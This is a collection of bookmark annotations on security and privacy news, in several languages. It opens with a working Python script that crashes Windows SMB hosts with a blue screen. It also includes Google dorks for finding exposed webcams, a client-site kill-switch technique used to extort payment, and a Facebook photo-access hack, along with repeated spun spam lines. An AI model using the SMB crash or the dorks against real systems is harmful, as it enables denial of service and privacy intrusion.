Smb-Bsod.py: #!/usr/bin/python from time import sleep host = "IP_ADDR", 445 buff = ( "\x00\x00\x00\x90" # Begin SMB header: Session message "\xff\x53\x4d\x42" # Server Component: SMB "\x72\x00\x00\x00" # Negociate Protocol "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00" ) s = socket() s.connect(host) s.send(buff) s.close()

This is why we do regression testing, folks!

入力値は疑え。

http://note.openvista.jp/2008/php-security-memo/

IBMによる PHP セキュリティ講座。 ↓厳しいつっこみあり。 http://d.hatena.ne.jp/ockeghem/20081101/p1 ↓参考に http://note.openvista.jp/2008/php-security-memo/ そういえば、PHP のソースコードが流出する問題は解決したのかなぁ。

Viruses And That-ICT

Ha ha...as if a bounty shall do your hopelessness any good....

The Conficker worm is a computer worm that can infect your computer and spread itself to other computers across a network automatically, without human interaction.

"Is there a middle path—a way to provide feedback and reduce password errors that doesn’t sacrifice the user experience? At least two design patterns address this issue in offline applications, and with a little JavaScript, we can bring them to the web. [...] The simplest solution is to mask the password by default while giving users a way to switch the field to clear text. [...] Apple adopted an interesting approach. The last letter typed into the field remains visible for a couple of seconds before turning into a dot. This creates an opportunity to catch errors without showing the entire password at once."

when it comes to login pages where our most sensitive data are being held. Hence, there is a need to better understand how well your login page has been implemented to be considered as really secure. In this article, you will get a list of PHP secure login tips and tricks that will definitely help you decide on your secure rating of your login page.

"It gets to a deeper problem with Google Buzz: It's built on email, which is a very different Internet application than a social network." - I couldn't agree more; this new Google feature should NOT be based on your Gmail contacts, which are typically more private than, say, your friends on Twitter or Facebook.

まさに親方日の丸な力技ですね

で、お聞きしたのが分散自立システム。 スイカのサーバーって単純に二重化とかしているんじゃないんですって。 えっと、俺人に説明するのがへたくそなので、また下手な喩え方をしちゃうけど、俺の理解ではDNSみたいのにちかいかも。 マスターがあるP2Pとか？ マスターノードみたいのがあって、駅ノードがあって、クライアント(改札機)があって、クライアントでチェックを行うと。多分無ければセンターにいくんだろうね。 プルとプッシュのタイミングが結構工夫されてるのかもしれない。 こっから先は多分だけど、駅ノードのレベルで横の連携があるので、マスターは最悪３日ぐらい停止していても実際に影響はなかなか出ないのかな。 もしこれが、センター問い合わせ系だったらもっとお金が掛かった上に、安定性がなかったことだろうとのこと。 やっぱり、これはちょっとしたインターネットの世界ですよ。うん。

suicaのサーバーはみんなの知らないところで、実はたまに落ちているそうだ。 だがシステムが止まることはない、計算上センターは3日ぐらいは止まっていても大丈夫だそうだ。 だからサーバーが落ちたなどとニュース沙汰になることは殆ど無い。

CSS (short for "Cascading Style Sheets") is the markup that makes the internet look the way it does. CSS Killswitch works by creating a unique, inconspicuous, and innocuous stylesheet that you'll link the potentially problematic client's site to. Should negotiations go south and passwords get changed before you receive payment, that stylesheet can be activated to superficially black out the site, returning to you the upper hand. * When relations return and you've received payment, the killswitch is easily deactivated and its traces removed. Not convinced? Try a two second demo of what it could do to this page. Oh, did I mention this is free? Because it's free.

CSS Killswitch lets you non- destructively black out a difficult client's website with the click of a button.

ime:クラッシュ発生日時 Bug Check S

ブルースクリーンで強制終了した原因を解析して教えてくれるフリーソフト

ブルースクリーン発生時に生成されるダンプファイルを見つけ出して解析して表示することによってエラーの原因を教えてくれるので、使い方によってはかなり便利です。Windows XP・Windows Server 2003・Windows Server 2008・Windows Vista・Windows 7の32ビット版に対応しており、将来的には64ビット版にも対応予定があるとのこと

How Coverity built a bug-finding tool, and a business, around the unlimited supply of bugs in software systems.

“The unusual starts to occur with increasing frequency.”

RT @hdmoore: Hilarious: http://bit.ly/98Tmfp ( sharing your location isn't always smart )

je kon er op wachten he.

The internet has everything!

The danger is publicly telling people where you are. This is because it leaves one place you're definitely not... home. So here we are; on one end we're leaving lights on when we're going on a holiday, and on the other we're telling everybody on the internet we're not home. It gets even worse if you have "friends" who want to colonize your house. That means they have to enter your address, to tell everyone where they are. Your address.. on the internet.. Now you know what to do when people reach for their phone as soon as they enter your home. That's right, slap them across the face.

Web Developers: Have you ever gotten to the end of a project, and had a client withhold the last of your fee to exact additional changes or features that were not in the original plan? Perhaps a client that decided your work “wasn’t what we expected” and tried to withhold payment? Well worry no more. Put the power back in your hands with a Remote Kill Switch. The idea is this: you build into their website a small function that checks with a server you control to make sure the client’s account is in good standing. If it is, the site loads as normal. If not, their site doesn’t load, and they get a message asking for payment.

Granska ipred-lagen

watch the watchdogs

The internet is filled with junk. One of the most common pieces of junk is spam. Many of us are bombarded with spam every day and hate it. Although there are a

Five Free Temporary Email Services To Avoid Spam | MakeUseOf.com

<blockquote> <cite><img src="http://favicon.hatena.ne.jp/?url=http%3A%2F%2Fsourceforge.jp%2Fmagazine%2F09%2F01%2F29%2F015235" alt="" /> <a href="http://sourceforge.jp/magazine/09/01/29/015235">VPNtinc - SourceForge.JP Magazine</a></cite> <p>tinc Virtual Private NetworkVPNVPN2tincPCWi-FiLANWPA2...</p> <p><a href="http://b.hatena.ne.jp/entry/http://sourceforge.jp/magazine/09/01/29/015235"><img src="http://b.hatena.ne.jp/entry/image/http://sourceforge.jp/magazine/09/01/29/015235" alt=" - VPNtinc - SourceForge.JP Magazine" title=" - VPNtinc - SourceForge.JP Magazine" border="0" /></a> <a href="http://b.hatena.ne.jp/append?http://sourceforge.jp/magazine/09/01/29/015235"><img src="http://b.hatena.ne.jp/images/append.gif" border="0" alt="" title="" /></a></p> </blockquote>

Documentacion Nmap 5.0

Nmap has finally gotten a major update after many years. Every network administrator should be familiar with this tool.

Insecure.Org is pleased to announce the immediate, free availability of the Nmap Security Scanner version 5.00 from http://nmap.org/

How I Hacked Hacker News (with arc security advisory)

jailbreak iphone

RT @MuscleNerd: 3.0 JB for mac owners is now out http://is.gd/16t1c -- youtube issues fixed too! &lt;&lt; Awesome [from http://twitter.com/robinhowlett/statuses/2241134783]

The laptops issued to high-school students in the well-heeled Philly suburb have webcams that can be covertly activated by the schools' administrators, who have used this facility to spy on students and even their families. The issue came to light when the Robbins's child was disciplined for "improper behavior in his home" and the Vice Principal used a photo taken by the webcam as evidence. The suit is a class action, brought on behalf of all students issued with these machines.

According to the filings in Blake J Robbins v Lower Merion School District (PA) et al, the laptops issued to high-school students in the well-heeled Philly suburb have webcams that can be covertly activated by the schools' administrators, who have used this facility to spy on students and even their families

According to the filings in Blake J Robbins v Lower Merion School District (PA) et al, the laptops issued to high-school students in the well-heeled Philly suburb have webcams that can be covertly activated by the schools' administrators, who have used this facility to spy on students and even their families.

According to the filings in Blake J Robbins v Lower Merion School District (PA) et al, the laptops issued to high-school students in the well-heeled Philly suburb have webcams that can be covertly activated by the schools' administrators, who have used this facility to spy on students and even their families. The issue came to light when the Robbins's child was disciplined for "improper behavior in his home" and the Vice Principal used a photo taken by the webcam as evidence. The suit is a class action, brought on behalf of all students issued with these machines. If true, these allegations are about as creepy as they come. I don't know about you, but I often have the laptop in the room while I'm getting dressed, having private discussions with my family, and so on. The idea that a school district would not only spy on its students' clickstreams and emails (bad enough), but also use these machines as AV bugs is purely horrifying.

School used student laptop webcams to spy on them at school and home Boing Boing

if you borrow a laptop from your school or government, double check they're not spying on you. Scary post from Boing Boing about how one school in Philadelphia has been turning on the students' web cameras remotely to monitor "student behaviour". via stephen downes.

According to the filings in Blake J Robbins v Lower Merion School District (PA) et al, the laptops issued to high-school students in the well-heeled Philly suburb have webcams that can be covertly activated by the schools' administrators, who have used this facility to spy on students and even their families. Creepy!

See also /. discussion http://yro.slashdot.org/story/10/02/21/2010213/PA-School-Defends-Web-Cam-Spying-As-Security-Measure-Denies-Misuse

410 financial institutions

Researchers hijack botnet, score 56,000 passwords in an hour - Ars Technica http://ow.ly/5eyt [from http://twitter.com/ChipRiley/statuses/1706638693]

“The Torpig botnet was hijacked by the good guys for ten days earlier this year before its controllers issued an update and took the botnet back. During that time, however, researchers were able to gain a glimpse into the kind of information the botnet gathers as well as the behavior of Internet users who are prone to malware infections. ” – via nelson

) 地域はAL　他は全部いつものクレカ情報や住所のまま

Hotspot Shield

誰かまともな発注先を見分ける質問リストとか作ったらどうだろうか

Data Permanent Eraser

"With stories abounding of identity theft aided by information lifted from discarded storage devices, you want devices you no longer plan to use to have no usable information when they head out the door. Here's how to wipe them clean."

Leave No Trace: How to Completely Erase Your Hard Drives, SSDs and Thumb Drives - Data wiping

n accosted many times, but never with success. Although I wouldn’t recommend this tactic to everyone, here’s my secret: If you are forced to walk somewhere dodgy, such as the Albayzin or Sacromonte areas of Granada in Spain (tiny thousand-year-old streets, a labyrinth where masked thieves — usually little punk kids — like to prey), one thing I’ve found that works is putting on the “Oh man, what have I done?!” face. This is the kind of face one may have as they are thinking to themselves: “Oh man, I shouldn’t have hit that last person so hard...I wonder if they’re dead?” Imagine it. It’s the face of a person who has absolutely cracked, gone off the deep end, and just killed someone. This may sound really weird, but trust me, if you wear

Interesting list of scams perpetrated on travelers. I always ask myself if I am just lucky or actually more careful -- apart from the occasional over-charging taxi, nothing has ever happened to me.

Cover yourself against travel scams

How many times have you driven by an electronic road sign like one of these? This is the ADDCO portable sign. Today, you see what is on the inside, and how they are programmed to display important information.

this is how they did the zombies ahead thing

road sign programming

We type on, engrossed in conversation, forgetting we're being recorded and those recordings might come back to haunt us later. Oliver North learned this, way back in 1987, when messages he thought he had deleted were saved by the White House PROFS system, and then subpoenaed in the Iran-Contra affair. Bill Gates learned this in 1998 when his conversational e-mails were provided to opposing counsel as part of the antitrust litigation discovery process. Mark Foley learned this in 2006 when his instant messages were saved and made public by the underage men he talked to. Paris Hilton learned this in 2005 when her cell phone account was hacked, and Sarah Palin learned it earlier this year when her Yahoo e-mail account was hacked. ... Ephemeral conversation is dying. Cardinal Richelieu:If one would give me six lines written by the hand of the most honest man, I would find something in them to have him hanged."

"Conversation used to be ephemeral. Whether face-to-face or by phone, we could be reasonably sure that what we said disappeared as soon as we said it. Organized crime bosses worried about phone taps and room bugs, but that was the exception. Privacy was just assumed. This has changed. We chat in e-mail, over SMS and IM, and on social networking websites like Facebook, MySpace, and LiveJournal. We blog and we Twitter. These conversations -- with friends, lovers, colleagues, members of our cabinet -- are not ephemeral; they leave their own electronic trails. We know this intellectually, but we haven't truly internalized it. We type on, engrossed in conversation, forgetting we're being recorded and those recordings might come back to haunt us later."

When he becomes president, Barack Obama will have to give up his BlackBerry. Aides are concerned that his unofficial conversations would become part of the presidential record, subject to subpoena and eventually made public as part of the country's historical record.

"When he becomes president, Barack Obama will have to give up his BlackBerry. Aides are concerned that his unofficial conversations would become part of the presidential record, subject to subpoena and eventually made public as part of the country's historical record."

But as technology makes our conversations less ephemeral, we need laws to step in and safeguard ephemeral conversation.

"The younger generation chats digitally, and the older generation treats those chats as written correspondence. ... until we have a Presidential election where both candidates have a complete history on social networking sites from before they were teenagers -- we aren't fully an information age society." (via Oblinks)

Main article on the 4th bomb in BBC by Gordon Corera "The United States abandoned a nuclear weapon beneath the ice in northern Greenland following a crash in 1968, a BBC investigation has found."

"Users of Microsoft's Internet Explorer are being urged by experts to switch to a rival until a serious security flaw has been fixed."

Draeger, the manufacturer maintained that the system was perfect, and that revealing the source code would be damaging to its business. They were right about the second part, of course, because it turned out that the code was terrible.

A small note on how important it is to have access to the software we use in the the judicial system

"Draeger, the manufacturer maintained that the system was perfect, and that revealing the source code would be damaging to its business. They were right about the second part, of course, because it turned out that the code was terrible."

People surely are going to sue for this

The Internet runs right through the middle of our kids' lives. It opens a world of entertainment and communication, but it also allows direct access to people and Web sites that can expose kids to age-inappropriate content and risky social contacts. At Common Sense Media, we believe in media sanity, not censorship. And since we can't always cover our kids' eyes, we have to teach them how to see. The information here will help your kids stay Internet safe and smart. Click on the links below to find out what every parent should know about how our kids use the Internet.

he Internet runs right through the middle

guide on what to check on facebook along with other stuff good resource for parents moveis books too

dannah boyd keynote notes from sxsw2010 via monstro

パスワード

A variety of random keys that can be used for passwords, encryption keys, etc. - all randomly generated

Here you will find a variety of random keys that can be used for passwords, encryption keys, etc. - all randomly generated, just for you! Simply refresh this page for a completly new set of keys.

Help students prevent from online predators, cyberbullying, and sexual abuse

This website has information and links from internet dangers to how to report a web crime. This site also gives tips for parents and has link to other cafety sites.

(This is old, just saving it for later.)

execute *every* SMS as root... so handy

"when the phone booted it started up a command shell as root and sent every keystroke you ever typed on the keyboard from then on to that shell."

Content Type: text/html; charset=UTF-8

interesting gphone bug

Don't tell me they thought of that as being a feature...

A fully automated, active web application security reconnaissance tool. Key features: * High speed: pure C code, highly optimized HTTP handling, minimal CPU footprint - easily achieving 2000 requests per second with responsive targets. * Ease of use: heuristics to support a variety of quirky web frameworks and mixed-technology sites, with automatic learning capabilities, on-the-fly wordlist creation, and form autocompletion. * Cutting-edge security logic: high quality, low false positive, differential security checks, capable of spotting a range of subtle flaws, including blind injection vectors.

@z0nbi What does the #security community think of this announcement: http://code.google.com/p/skipfish/ ~ A Google web app security scanner.

Da un'idea di Giuseppe "Gippa" Paternò, un libro on-line sulle architetture di sicurezza e relative implementazioni.

HP SWFScan is a free Windows-based security tool to help developers find and fix security vulnerabilities in applications developed with the Adobe Flash Platform. The tool is the first of its kind to decompile applications developed with the Flash platform and perform static analysis to understand their behaviors. This helps developers without security backgrounds identify vulnerabilities hidden within the application which cannot be detected with dynamic analysis methods.

Décompilateur gratuit d'applications Flash / Flex (SWF) et recherche de vulnérabilités et trous de sécurité, divulgation d'informations...

Hacker war drives San Francisco cloning #RFID passports http://j.mp/cQh2ro

an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a r

Software om webapplications te testen, ook op beveiliging

「・・・skipfish - web application security scanner・・・」

Security checks and link extraction for third-party, plugin-based content (Flash, Java, PDF, etc).

Every OAuth provider should encapsulate OAuth authorization inside OpenID. Better UX, lesser redirects http://bit.ly/7qbfPB

OAuth-enabled APIs su

RT @tweetlicius: Your Gmail Account is Now An OpenID - http://tcrn.ch/aAxVXq

You may not know it, but you probably have an OpenID. If you have a Yahoo account, you have an OpenID. If you have a Windows Live account, you will soon have an OpenID. And today, if you have a Google e-mail account, you can also start using your Gmail address as an OpenID. By joining the OpenID movement, Google completes the trifecta and adds all of its Gmail users to the hundreds of millions of Yahoo and Windows Live accounts that can also be used as a single login for any Website that accepts OpenID. While Google is more than happy to become an issuer of OpenIDs, what is not so clear is whether it will accept other OpenIDs for people who want to sign up for Google services.

Google appears to be an OpenID “provider,” not a “relying party.” In other words, you cannot sign into Google with your Yahoo account. But this still helps the OpenID movement as a whole because it gives smaller sites more incentive to join as “relying parties.” Among the first sites to accept Gmail accounts for sign in are Zoho and Plaxo.

even take driving tests, apply for passports, or enroll in college classes under one of his many aliases: J

a real-life master criminal

Former National Security Agency analyst Russell Tice, who helped expose the NSA's warrantless wiretapping in December 2005, has now come forward with even more startling allegations. Tice told MSNBC's Keith Olbermann on Wednesday that the programs that spied on Americans were not only much broader than previously acknowledged but specifically targeted journalists.

Article was updated. One time there were military helicopters that were hovering directly over me and Kenneth's apartments in Bowling Green. I went to tell Francis Gardler what had just happened to me and he just dismissed me as paranoid and crazy. Of course, military helicopters really did hover directly over our apartments. That's about the time that I started losing respect for Gardler.

Whether you were in Kansas and you never made foreign communications at all. They monitored all communications: says Whistleblower Russell Tice

A powerful toolset for rescue & repair of infected machines.

The AVG Rescue CD is a powerful must-have toolkit for the rescue and repair of infected machines. It provides essential utilities for system administrators and other IT professionals and includes the following features: * Comprehensive administration toolkit * System recovery from virus and spyware infections * Suitable for recovering MS Windows and Linux operating systems (FAT32 and NTFS file systems) * Ability to perform a clean boot from CD or USB stick * Free support and service for paid license holders of any AVG product * FAQ and Free Forum self-help support for AVG Free users

sshにはダイナミック転送という機能がある。この機能を使うと、sshはアプリケーション側にはSOCKSプロクシとして振る舞うが、そこからsshの接続先までは暗号化された状態で通信が行われる。

Firefoxからsshのダイナミック転送を使って非公開サーバへアクセスする - 射撃しつつ前転 sshにはダイナミック転送という機能がある。この機能を使うと、sshはアプリケーション側にはSOCKSプロクシとして振る舞うが、そこからsshの接続先までは暗号化された状態で通信が行われる。 これだけだと通常のトンネリングとどう違うのかよくわからないかもしれないが、ダイナミック転送の場合は転送ポートを指定する必要がない。ここがダイナミックと表現される所以だろう。 例えば、オフィスAにある開発サーバ... はてなブックマーク - Firefoxからsshのダイナミック転送を使って非公開サーバへアクセスする - 射撃しつつ前転 はてなブックマークに追加 dann dann ssh, firefox

Some days ago a reader asked Daniel for advice when his blog got hacked. Daniel recommended some good security measures to keep WordPress safe. In case you missed it, read the post here: What if my WordPress Blog Got Hacked with the Google Redirect?

Sprawdzić

pwnat, pronounced "poe-nat", is a tool that allows any number of clients behind NATs to communicate with a server behind a separate NAT with *no* port forwarding and *no* DMZ setup on any routers in order to directly communicate with each other.

pwnat, pronounced "poe-nat", is a tool that allows any number of clients behind NATs to communicate with a server behind a separate NAT with *no* port forwarding and *no* DMZ setup on any routers in order to directly communicate with each other. The server does not need to know anything about the clients trying to connect. Simply put, this is a proxy server that works behind a NAT, even when the client is behind a NAT, without any 3rd party. There is no middle man, no proxy, no 3rd party, no UPnP/STUN/ICE required, no spoofing, and no DNS tricks. More importantly, the client can then connect to any host or port on any remote host or to a fixed host and port decided by the server.

pwnat - Serverless NAT to NAT (UDP hole punching for everybody, yay)

Featured Download: AlwaysVPN Takes U.S.-Only Sites International for HULU, etc from US

Coding technique without error

guide to 25 of the most dangerous programming mistakes - a must read!

outsider

Security

f you invited me to try and crack your password, you know the one that you use over and over for like every web page you visit, how many guesses would it take before I got it?

Whilst bank cards along with money cards may appear virtually the exact same, its not all plastic may be the identical.

Although charge cards and money cards may well look almost the exact same, not all plastic will be the exact same.

Although bank cards along with money handmade cards could appear practically identical, its not all plastic will be the exact same.

Whilst charge cards along with debit handmade cards could glimpse almost identical, not every plastic material may be the same.

Although plastic cards and also debit greeting cards could glimpse nearly the same, not every plastic could be the exact same.

When credit cards as well as money handmade cards might glimpse almost identical, not all plastic-type may be the identical.

When credit cards along with money handmade cards might glimpse practically similar, not all plastic material will be the same.

Whilst plastic cards along with money homemade cards may well appear practically the same, not all cheap could be the similar.

Whilst credit cards along with debit cards may well look virtually the exact same, not every plastic will be the similar.

Web application whspr! creates a private feedback form that you can share on services like Twitter without revealing your real email address. Simply enter your real email address, a description of what the form is for, and the number of days you want the form to be active. Once completed, you'll be given a URL to the form to share with others. This application could be useful for job postings, blog contests or giveaways—pretty much anything where you'd like email responses but don't want to give out an email address. If you want to send private messages instead of receiving them, check out previously mentioned Whisper Bot, or you can send your awkward messages anonymously with NiceCritic.

ply enter your real

** Posted using Viigo: Mobile RSS, Sports, Current Events and more **

sudo dtrace -n 'syscall::write*:entry /execname == "Spotify" && arg0 == 2/ { trace(copyinstr(arg1)); ustack(); }'

"Spotify for Windows contains code so awesome that [Windows debugger] OllyDbg can't look at it without crashing."

Spotify for Windows contains code so awesome that OllyDbg can't look at it without crashing.

Amid the many uncertainties loosed by the al-Qaida attacks on Sept. 11, 2001, one forecast seemed beyond doubt: Islamist terrorists would strike the United States again—and soon.

Clear overview of the prevailing theories about why no major attacks have occurred since 9/11/01.

People on windows PCs without updated virus software should probably take a look at this http://is.gd/pVSc [from http://twitter.com/standardman/statuses/1427842931]

anti theft, etc

Someday, somewhere, somehow your computer will be gone. It will be stolen, or the hard drive will self-destruct, or it will be hit by a meteor. While the latter would at least provide you with an excellent story, assuming you weren't using it at the time, having your laptop stolen, as mine was recently, just plain sucks. However, I did manage to learn a few things in the wake of disaster, and wanted to take the opportunity to share them with you here.

Three things are lost with a computer's theft: hardware, data, and privacy. I'll let others deal with the emotional aspects of loss, and instead focus on the practical ones.

Comment protéger son macbook en cas de vol

There is a growing belief among engineers and security experts that Internet security and privacy have become so maddeningly elusive that the only way to fix the problem is to start over. What a new Internet might look like is still widely debated, but one alternative would, in effect, create a “gated community” where users would give up their anonymity and certain freedoms in return for safety.

Problems with privacy are making experts to think about a new inertenet. Question to the class: Is it possible?

"there is a growing belief among engineers and security experts that Internet security and privacy have become so maddeningly elusive that the only way to fix the problem is to start over.""A more secure network is one that would almost certainly offer less anonymity and privacy."

"What a new Internet might look like is still widely debated, but one alternative would, in effect, create a “gated community” where users would give up their anonymity and certain freedoms in return for safety. Today that is already the case for many corporate and government Internet users. As a new and more secure network becomes widely adopted, the current Internet might end up as the bad neighborhood of cyberspace. You would enter at your own risk and keep an eye over your shoulder while you were there"

Do We Need a New Internet?

Do We Need a New Internet? http://tinyurl.com/cdgwv4 via NYT [from http://twitter.com/bibliothekarin/statuses/1218288148]

An automated backup service for WP

Wordpress Multicloud-Backups. http://vaultpress.com/ – René Stalder (Nachtmeister) http://twitter.com/Nachtmeister/statuses/11632623041

Programmatic interfaces of Web 2.0 applications let hackers automate attacks easier. In addition to brute force and CSRF attacks, other examples include the automated retrieval of a large amount of information and the automated opening of accounts. Anti-automation mechanisms like Captchas can help slow down or thwart these types of attacks.

security regarding amfphp

How Your Password Could Be Hacked: http://j.mp/9LPHl1 #it

Internet standards expert, CEO of web company iFusion Labs, and blogger John Pozadzides knows a thing or two about password security&mdash;and he knows exactly how he&#039;d hack the weak passwords you use all over the internet.

米Comodo Security Solutions, Inc.は13日（現地時間）、フリーの統合セキュリティソフト「COMODO Internet Security」v3.9.95478.509を公開した。本バージョンでは、有志らによるメニューなどの翻訳が行われ、新たに日本語をはじめとする19カ国語に対応した。編集部にて試用したところ、メイン画面の一部の説明文やヘルプファイルが英語表記であるほかは、ほぼすべての項目が日本語化されており、利用の際の敷居が非常に低くなっている。

Vista 64 bit 対応のフリーの統合セキュリティソフト。

ウイルス 日本語

各種携帯のみ許可する.htaccessを生成する

HTMLタグボードトップ >> 今すぐ使える！便利ツール >> Mobile IP htaccess Maker Mobile IP htaccess Maker 携帯端末以外のIPを制限するhtaccessを簡単生成

Annotated link http://www.diigo.com/bookmark/http%3A%2F%2Fwww.symantec.com%2Fsecurity_response%2Fwriteup.jsp%3Fdocid%3D2009-011316-0247-99

te

link al'eina per eliminar el cuc conficker

The tool is called depant ((DE)fault (PA)ssword (N)etwork (T)ool). Depant works by downloading a default password list, and then mapping out the local network to see what open services are available. Once it has a list of services, it will test each service for default passwords. Once it’s gone through each of the services, depant will determine the fastest service (as recorded in phase one) and use it to perform an optional second phase of tests with a larger (user-supplied) set of default users/passwords.

depant

Most counterterrorism policies fail, not because of tactical problems, but because of a fundamental misunderstanding of what motivates terrorists in the first place. If we're ever going to defeat terrorism, we need to understand what drives people to become terrorists in the first place.

"Conventional wisdom holds that terrorism is inherently political, and that people become terrorists for political reasons...Max Abrahms, a predoctoral fellow at Stanford, argues that this model is wrong, and discusses seven habits observed in terrorist groups that contradict the theory that terrorists are political maximizers...Abrahms has an alternative model to explain all this: People turn to terrorism for social solidarity."

Abrahms has an alternative model to explain all this: People turn to terrorism for social solidarity. He theorizes that people join terrorist organizations worldwide in order to be part of a community, much like the reason inner-city youths join gangs in the United States. The evidence supports this. [[Some of the comments are very intriguing as well. —Ed.]]

Most counterterrorism policies fail, not because of tactical problems, but because of a fundamental misunderstanding of what motivates terrorists in the first place—by Bruce Schneier

As many of you already know on November 2nd, MakeUseOf.com's domain was stolen from us. It took us about 36 hours to get the domain back. As we have pointed

As many of you already know on November 2nd, MakeUseOf.com’s domain was stolen from us. It took us about 36 hours to get the domain back. As we have pointed out earlier the hacker somehow managed to get access to my Gmail account and from there to our GoDaddy account, unlock the domain and move it to another registrar.

「ブックマークレットでそこまでやることが許されるのか」確かに、サイトの境界、オンラインとオフラインの境界が曖昧になりつつある昨今では難しい問題だ。

あたりまえだけどブラウザ側の機能でURIを表示できるようにしておかないと危険。

認証系の操作を外部サイトにおいて Javascript を使ってページ内ウィンドウを出して行うのはアウトではないかという指摘 via delicious/spiegel

WEEK 12 -- 04/14/2010

Much ado about NULL: Exploiting a kernel NULL dereference

Excised

http://www.gwu.edu/~nsarchiv/NSAEBB/NSAEBB260/index.htm Very interesting history of a once "black" agency.

Security concerns and record-keeping laws mean that Barack Obama is unlikely to become the first e-mailing president.

Obama may need to give up his BlackBerry to become president.

"For years, like legions of other professionals, Mr. Obama has been all but addicted to his BlackBerry. The device has rarely been far from his side — on most days, it was fastened to his belt — to provide a singular conduit to the outside world as the bubble around him grew tighter and tighter throughout his campaign."

Given how important it is for him to get unfiltered information from as many sources as possible, he will miss the freedom of email

The Sectéra® Edge™ smartphone converges secure wireless voice and data by combining the functionality of a wireless phone and PDA — all in one easy-to-use handheld device. Developed for the National Security Agency’s Secure Mobile Environment Portable Electronic Device (SME PED) program, the Sectéra Edge is certified to protect wireless voice communications classified Top Secret and below as well as access e-mail and websites classified Secret and below. The Sectéra Edge is the only SME PED that switches between an integrated classified and unclassified PDA with a single key press.

General Dynamics C4 Systems is a leading integrator of network-centric command, control, communication and computing solutions from space to ground - core to edge. The company’s focus is on engineering and integrating secure communication, information and technology solutions that facilitate the delivery of relevant information to speed the decision cycle, so our customers can see, hear, decide and act with absolute confidence - faster and more effectively.

Obama's new Blackberry - Sectera Edge by General Dynamics, the only smart phone NSA rated for Top Secret communications. http://is.gd/fZqn [from http://twitter.com/eighteyes/statuses/1139490924]

Obama's new NSA-approved phone

n detect: * File handling errors (Local and remote include/require, fopen, readfile…) * Database, XSS, LDAP and CRLF injections (HTTP response splitting, session fixation…) * Command execution detection (eval(),

Netsparker Community Edition (Windows), Websecurify (Windows, Linux, Mac OS X), Wapiti (Windows, Linux, Mac OS X), N-Stalker Free Version (Windows), Skipfish (Windows, Linux, Mac OS X), Scrawlr (Windows), x5s (Windows), Exploit-Me (Windows, Linux, Mac OS X), WebScarab (Windows, Linux, Mac OS X), Acunetix Free Version (Windows)

NoScript いいけどなぁ。一般人には使いにくいだろうけど。普段使わないサイトで JavaScript が必要な場合は、Chrome か Safari を使うので問題ないし。

e session cookies for every photo request, but we’ll assume this is impractical giv

Last March, Facebook caught some flak when some hacks circulated showing how to access private photos of any user. These were enabled by egregiously lazy design: viewing somebody’s private photos simply required determining their user ID (which shows up in search results) and then manually fetching a URL of the form: www.facebook.com/photo.php?pid=1&view=all&subj=[uid]&id=[uid] This hack was live for a few weeks in February, exposing some photos of Facebook CEO Mark Zuckerberg and (reportedly) Paris Hilton, before the media picked it up in March and Facebook upgraded the site. Instead of using properly formatted PHP queries as capabilities to view photos, Faceook now verifies the requesting user against the ACL for each photo request. What could possibly go wrong? Well, as I discovered this week, the photos themselves are served from a separate content-delivery domain, leading to some problems which

9000, which can be searched in about 45 minutes using one script. This is also easily parallelisable, given that we can query any of the mirrored photo servers in the

起きてしまったことを、どうコミュニケーションすることで、前向きに受け取ってもらうか

Plugin para o Firefox que reconhece captchas, com links para código fonte.

OCR in javascript

Auto-fills the megaupload captchas and optionally auto-starts download

neural-net OCR in javascript

Extra setup required for your app to send email. Some tips on how to get that going, check that you have what you need, and test it's working

Just some tidbits to keep around in case I end up writing an smtp server on a side job I'm considering

A PasswordCard is a credit card-sized card you keep in your wallet, which lets you pick very secure passwords for all your websites, without having to remember them! You just keep them with you, and even if your wallet does get stolen, the thief will still not know your actual passwords.

* Don't read along with your finger, or the smudge will tell a thief where your password is. * Keep your PasswordCard on your person, don't leave it lying around near your computer. * Clear your browser cache and history after printing this page.

Benjamin Franklin: scientist, scholar, statesman, and . . . systems administrator? Yes, 200 years or so before the birth of UNIX®, Franklin scribed sage advice to keep systems humming. Here are 10 of Franklin's more notable tips.

Divertido y didáctico artículo donde una serie de reflexiones de Benjamin Franklin son aplicadas a la administración de sistemas.

Benjamin Franklin: scientist, scholar, statesman, and . . . systems administrator? Yes, 200 years or so before the birth of UNIX, Franklin scribed sage advice to keep systems humming. Here are 10 of Franklin's more notable tips.

Resources that emit Json arrays risk data theft

Changes to Facebook and privacy

Facebook launched some fairly impressive new features and services at its recent f8 conference, but some of them were also more than just a little scary. Since a lot of what the company talked about was introduced in either “developer speak” — involving terms like API [...]

inurl:”viewerframe?mode=motion”

intitle:Live View / AXIS

?intitle:index.of?mp3 Linkin Park

“?intitle:index.of?mp3 Linkin Park“

Ein Wörterbuch über Begriffe aus Sicherheitsdebatten und was damit eigentlich gemeint ist.

Wie lassen sich Einschränkungen der Freiheit als Gewinn verkaufen? Indem man sie sprachlich vernebelt. Ein Katalog des Neusprech der Inneren Sicherheit

Untersucht mit welchen Worten die immer neuen Einschränkungen persönlicher Freiheiten gerechtfertigt werden, die in den vergangenen Jahren im Zuge des "Kampfs gegen den Terror" und der Stärkung des abwehrbereiten Staates verabschiedet wurden.

herrlich und gefährlich, wie euphemismen eingesetzt werden, um polizeistaat-handlungen zu beschreiben. beispiel: "finaler rettungsschuss" statt schießbefehl/tötungsgenehmigung

Axence NetTools Is Advanced Network Monitoring Tool - Windows - Lifehacker

